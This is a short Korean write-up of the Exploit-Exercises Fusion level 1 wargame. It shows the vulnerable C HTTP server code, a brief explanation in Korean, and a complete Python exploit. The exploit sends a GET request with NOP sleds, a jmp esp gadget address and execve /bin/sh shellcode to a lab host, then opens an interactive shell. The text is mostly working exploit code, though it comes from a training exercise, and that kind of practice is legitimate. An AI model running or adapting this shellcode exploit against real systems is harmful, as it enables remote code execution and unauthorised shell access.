-
Fusion Level 1Exploit-Exercise 2016. 7. 12. 23:52
#include "../common/common.c" int fix_path(char *path) { char resolved[128]; if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open strcpy(path, resolved); } char *parse_http_request() { char buffer[1024]; char *path; char *q; // printf("[debug] buffer is at 0x%08x :-)\n", buffer); :D if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host"); if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request"); path = &buffer[4]; q = strchr(path, ' '); if(! q) errx(0, "No protocol version specified"); *q++ = 0; if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol"); fix_path(path); printf("trying to access %s\n", path); return path; } int main(int argc, char **argv, char **envp) { int fd; char *p; background_process(NAME, UID, GID); fd = serve_forever(PORT); set_io(fd); parse_http_request(); }
코드는 간단하다.
사이즈에 맞게 버퍼를 입력받아주고, 버퍼의 주소를 path에 넣어준다. path에는 공백이 존재해야하고, 끝은 HTT/1.1로 마무리해야한다.
from socket import * from telnetlib import * import struct p = lambda x:struct.pack("<L",x) HOST = "10.211.55.15" PORT = 20001 s = socket(AF_INET,SOCK_STREAM) s.connect((HOST,PORT)) shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" jmpesp = 0x08049F4F payload = "GET " payload += "\x90"*139 payload += p(jmpesp) payload += "\x90"*100 payload += shellcode payload += " HTTP/1.1" s.send(payload + "\n") t = Telnet() t.sock = s t.interact()
DEP가 안걸려있어 0xffe4 jmp esp가젯을 사용해도 무방하다